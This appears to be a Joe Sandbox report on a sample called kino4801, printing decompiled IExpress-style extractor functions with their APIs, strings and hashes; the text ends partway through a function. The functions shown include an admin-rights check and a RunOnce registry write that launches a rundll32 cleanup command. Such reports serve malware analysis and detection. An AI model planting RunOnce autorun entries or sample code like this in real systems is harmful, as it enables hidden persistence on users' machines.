Instruction Fuzzy Hash: EB510676A0131AABDB219E28CC48BBA7BB8EF45300F014194FD89E7649DB36D945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010D2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E010D2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x10d8004; // 0x261cebeb
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E010D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E010D658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E010D658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x10d1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E010D1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E010D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x010d2773
0x010d277e
0x010d2785
0x010d278a
0x010d278d
0x010d2790
0x010d2792
0x010d2798
0x010d279d
0x010d28b2
0x00000000
0x010d27a3
0x010d27a3
0x010d27af
0x010d27c2
0x010d27c8
0x010d27cd
0x010d27d5
0x010d28b7
0x010d28b9
0x00000000
0x010d27db
0x010d27dd
0x010d28aa
0x00000000
0x010d27e3
0x010d27e3
0x010d27ec
0x010d27f8
0x010d2803
0x010d280b
0x010d2831
0x010d28c3
0x010d28c9
0x010d28cd
0x010d2837
0x010d285a
0x010d285c
0x010d2865
0x010d2892
0x010d2895
0x00000000
0x00000000
0x010d2867
0x010d2878
0x010d288c
0x00000000
0x010d287a
0x010d2880
0x010d2885
0x010d2897
0x010d2899
0x010d2899
0x010d2878
0x010d2865
0x010d28a0
0x010d28bf
0x010d28c1
0x00000000
0x00000000
0x010d28c1
0x010d2831
0x010d27dd
0x010d27d5
0x010d28e5

APIs

CharUpperA.USER32(261CEBEB,00000000,00000000,00000000), ref: 010D27A8
CharNextA.USER32(0000054D), ref: 010D27B5
CharNextA.USER32(00000000), ref: 010D27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2829
RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010D28AA
GetSystemDirectoryA.KERNEL32 ref: 010D28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010D27E4

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 6fac66c81c070d0973f5b0d477847fd363732aad5abf33f6a67cf08069566bdc
Instruction ID: 32ffdc73c66ee06cae09b104275357cc36d8e4de1699c0b2b078d9b2e4730e08
Opcode Fuzzy Hash: 6fac66c81c070d0973f5b0d477847fd363732aad5abf33f6a67cf08069566bdc
Instruction Fuzzy Hash: E941A071A01228AFDB259B64DC85AFABBBDEB15700F0040E9F9C9D3105DB758EC58FA0

Uniqueness

Uniqueness Score: -1.00%

Function 010D2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E010D2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x10d8004; // 0x261cebeb
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x10d8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E010D658A( &_v268, 0x104, 0x10d1140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
							E010D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E010D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x010d2272
0x010d2277
0x010d2279
0x010d2283
0x010d2289
0x010d22ab
0x010d22b1
0x010d22c4
0x010d22e0
0x010d22e6
0x010d22f5
0x010d230d
0x010d231c
0x010d231c
0x010d2321
0x010d233a
0x010d2342
0x010d2348
0x010d234b
0x010d234c
0x010d234c
0x010d234e
0x010d234f
0x010d236e
0x010d236e
0x010d237a
0x010d2380
0x010d2380
0x010d2381
0x010d2381
0x010d238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010D22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 010D22D8
memset.MSVCRT ref: 010D22F5
GetSystemDirectoryA.KERNEL32 ref: 010D2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010D236E
RegCloseKey.ADVAPI32(?), ref: 010D237A

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010D232D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010D2299
wextract_cleanup3, xrefs: 010D227C, 010D22CD, 010D2363
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D2321

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
API String ID: 3027380567-1707933020
Opcode ID: 0291c63ee397878c55fbbb439a087610a14775c93b008bec8ec168c67efe0be3
Instruction ID: c137d7a711cb86dc6ca05b9c074a56bfa38d99d32b4e2c0ec5b5ba32ee181130
Opcode Fuzzy Hash: 0291c63ee397878c55fbbb439a087610a14775c93b008bec8ec168c67efe0be3
Instruction Fuzzy Hash: 2531D971A00318ABDB719B65DC48FEA7B7CEF54740F0041E9F98DAB004DA756B84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010D3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E010D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x10d8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x10d8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E010D43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x10d8d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x10d88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E010D30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x010d3108
0x010d310b
0x010d31b7
0x010d31ca
0x010d31d0
0x010d31d0
0x010d31da
0x00000000
0x010d31da
0x010d3111
0x010d3114
0x010d3136
0x010d3136
0x010d3138
0x010d313b
0x010d3141
0x00000000
0x010d3143
0x010d3116
0x010d311b
0x010d314b
0x010d3151
0x010d3158
0x010d316a
0x010d3176
0x010d317d
0x010d318b
0x010d319e
0x010d31a3
0x00000000
0x010d31ad
0x010d3120
0x00000000
0x00000000
0x010d312a
0x010d3134
0x00000000
0x00000000
0x00000000
0x010d3134
0x010d312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 010D313B
GetDesktopWindow.USER32 ref: 010D314B
SetDlgItemTextA.USER32(?,00000834), ref: 010D316A
SetWindowTextA.USER32(?,doza2), ref: 010D3176
SetForegroundWindow.USER32(?), ref: 010D317D
GetDlgItem.USER32(?,00000834), ref: 010D3185
GetWindowLongA.USER32(00000000,000000FC), ref: 010D3190
SetWindowLongA.USER32(00000000,000000FC,010D30C0), ref: 010D31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010D31CA

Strings

doza2, xrefs: 010D3170

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: doza2
API String ID: 3785188418-612509477
Opcode ID: f61249711ae0ca172162997c3f9c493125508eaae56054a3a4ab591920176c35
Instruction ID: e7c354eeecb0eac7bcecf55f03de144189e80e11bee0505d6b49e3669d2d2fb2
Opcode Fuzzy Hash: f61249711ae0ca172162997c3f9c493125508eaae56054a3a4ab591920176c35
Instruction Fuzzy Hash: 8111A279246322FBDB615B38AC0CB6A3AB4FB46760F004611FDD59A188DB7A9141C746

Uniqueness

Uniqueness Score: -1.00%

Function 010D18A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E010D18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x10d8004; // 0x261cebeb
				_v8 = _t23 ^ _t53;
				_t25 =  *0x10d8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E010D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E010D17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x10d8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x10d8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x010d18a3
0x010d18a3
0x010d18ab
0x010d18b2
0x010d18b5
0x010d18be
0x010d18c0
0x010d18c6
0x010d18c7
0x010d18ca
0x010d18cf
0x010d19c9
0x010d19d8
0x010d19d8
0x010d18df
0x010d19b8
0x010d19bd
0x010d19bf
0x010d19bf
0x00000000
0x010d19bd
0x010d18fa
0x00000000
0x00000000
0x010d1912
0x010d19aa
0x010d19ad
0x010d19b3
0x00000000
0x010d1927
0x010d1927
0x010d1932
0x010d1936
0x010d19a9
0x010d19a9
0x00000000
0x010d19a9
0x010d194c
0x010d19a2
0x010d19a3
0x00000000
0x010d196e
0x010d1970
0x010d1999
0x010d199c
0x00000000
0x010d199c
0x010d1972
0x010d1972
0x010d1975
0x010d1984
0x010d1985
0x010d198a
0x00000000
0x00000000
0x00000000
0x010d198c
0x010d1991
0x010d1996
0x00000000
0x010d1996
0x010d194c

APIs

Part of subcall function 010D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010D18DD), ref: 010D181A
Part of subcall function 010D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010D182C
Part of subcall function 010D17EE: AllocateAndInitializeSid.ADVAPI32(010D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010D18DD), ref: 010D1855
Part of subcall function 010D17EE: FreeSid.ADVAPI32(?,?,?,?,010D18DD), ref: 010D1883
Part of subcall function 010D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010D18DD), ref: 010D188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010D18EB
OpenProcessToken.ADVAPI32(00000000), ref: 010D18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010D190A
GetLastError.KERNEL32 ref: 010D1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 010D192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010D1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010D1964
EqualSid.ADVAPI32(00000004,?), ref: 010D197A
FreeSid.ADVAPI32(?), ref: 010D199C
LocalFree.KERNEL32(00000000), ref: 010D19A3
CloseHandle.KERNEL32(?), ref: 010D19AD

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: df21d549d16853e1d7b029c206a60dca6b7cf214244980ce261c532816306d56
Instruction ID: 6bae62eb5225b5d0a6ced15905fb64f34ec08ba0edc856b1b233a80e48e89bc6
Opcode Fuzzy Hash: df21d549d16853e1d7b029c206a60dca6b7cf214244980ce261c532816306d56
Instruction Fuzzy Hash: 5C313A71A0130AEFDB609FA9DC88AAFBFBCFF04300B104469FA85D2144DB369905CB65

Uniqueness

Uniqueness Score: -1.00%

Function 010D468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E010D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x010d4699
0x010d469b
0x010d46a9
0x010d46af
0x010d46b4
0x010d46bc
0x010d46f9
0x00000000
0x010d46f9
0x010d46d9
0x010d46dd
0x00000000
0x00000000
0x010d46e5
0x010d46ef
0x00000000
0x010d46f5
0x010d46ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
memcpy_s.MSVCRT ref: 010D46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF

Strings

TITLE, xrefs: 010D469D, 010D46C0
doza2, xrefs: 010D46E4

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$doza2
API String ID: 3370778649-4167907646
Opcode ID: c40f13e36e2a3ec91f60b08379c6405ce1d73a988167c8742d1b48fb5f47b467
Instruction ID: 50e26eaa64510117a486db407930dfd80ccb46045f9786cd11c34179b86816c7
Opcode Fuzzy Hash: c40f13e36e2a3ec91f60b08379c6405ce1d73a988167c8742d1b48fb5f47b467
Instruction Fuzzy Hash: FC016D36345310FBE3701AA96C4DF6B7E6CDB89BA2F044014FFCAD7184C9B6884587A6

Uniqueness

Uniqueness Score: -1.00%

Function 010D17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E010D17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x10d8004; // 0x261cebeb
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x10da288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E010D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x010d17f6
0x010d17fd
0x010d1805
0x010d180b
0x010d180d
0x010d1815
0x010d1818
0x010d1820
0x010d1824
0x010d182c
0x010d1832
0x010d1837
0x010d1851
0x010d1854
0x010d185d
0x010d1862
0x010d186c
0x010d1872
0x010d1877
0x010d187e
0x010d187e
0x010d1883
0x010d1883
0x010d185d
0x010d188a
0x010d188a
0x010d18a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010D18DD), ref: 010D181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010D182C
AllocateAndInitializeSid.ADVAPI32(010D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010D18DD), ref: 010D1855
FreeSid.ADVAPI32(?,?,?,?,010D18DD), ref: 010D1883
FreeLibrary.KERNEL32(00000000,?,?,?,010D18DD), ref: 010D188A

Strings

advapi32.dll, xrefs: 010D1810
CheckTokenMembership, xrefs: 010D1826

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 59e87de73d36ee5632968a36a5a67421e357c07ea05833e216dc49000e2459cc
Instruction ID: 6911a63cad9597fe5b53701bd0f8797e374e17b008e9d01c5ed974faa547f455
Opcode Fuzzy Hash: 59e87de73d36ee5632968a36a5a67421e357c07ea05833e216dc49000e2459cc
Instruction Fuzzy Hash: 87116375F01309EBEB109FA5EC4AABEBFB8EF44701F100169FA45E7241DB7599008B91

Uniqueness

Uniqueness Score: -1.00%

Function 010D3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E010D43D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x10d9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x10d91dc = 1;
					goto L8;
				}
				return 0;
			}

0x010d3459
0x010d345c
0x010d34d8
0x010d34de
0x00000000
0x010d34e0
0x010d345e
0x010d3463
0x010d349a
0x010d34a0
0x010d34a7
0x010d34b2
0x010d34c4
0x010d34cb
0x00000000
0x010d34cb
0x010d3468
0x010d346e
0x010d3474
0x00000000
0x00000000
0x010d347c
0x010d348c
0x010d3490
0x00000000
0x010d3496
0x010d3484
0x00000000
0x00000000
0x010d3486
0x00000000
0x010d3486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 010D3490
GetDesktopWindow.USER32 ref: 010D349A
SetWindowTextA.USER32(?,doza2), ref: 010D34B2
SetDlgItemTextA.USER32(?,00000838), ref: 010D34C4
SetForegroundWindow.USER32(?), ref: 010D34CB
EndDialog.USER32(?,00000002), ref: 010D34D8

Strings

doza2, xrefs: 010D34AC

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: doza2
API String ID: 852535152-612509477
Opcode ID: 8fe498293f5a3b04782853b57d54044c5b9b472d99b1da768ace86e6163257c7
Instruction ID: 6eb429f9da4170dcfc1df63f6114b22e6575caddb1e1d2fe0d9256d932e47ac6
Opcode Fuzzy Hash: 8fe498293f5a3b04782853b57d54044c5b9b472d99b1da768ace86e6163257c7
Instruction Fuzzy Hash: 9301B179341324ABD7665F79E80C9AE3AA4FB45750B044014FEC69B984CF3EAA41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 010D2AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E010D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
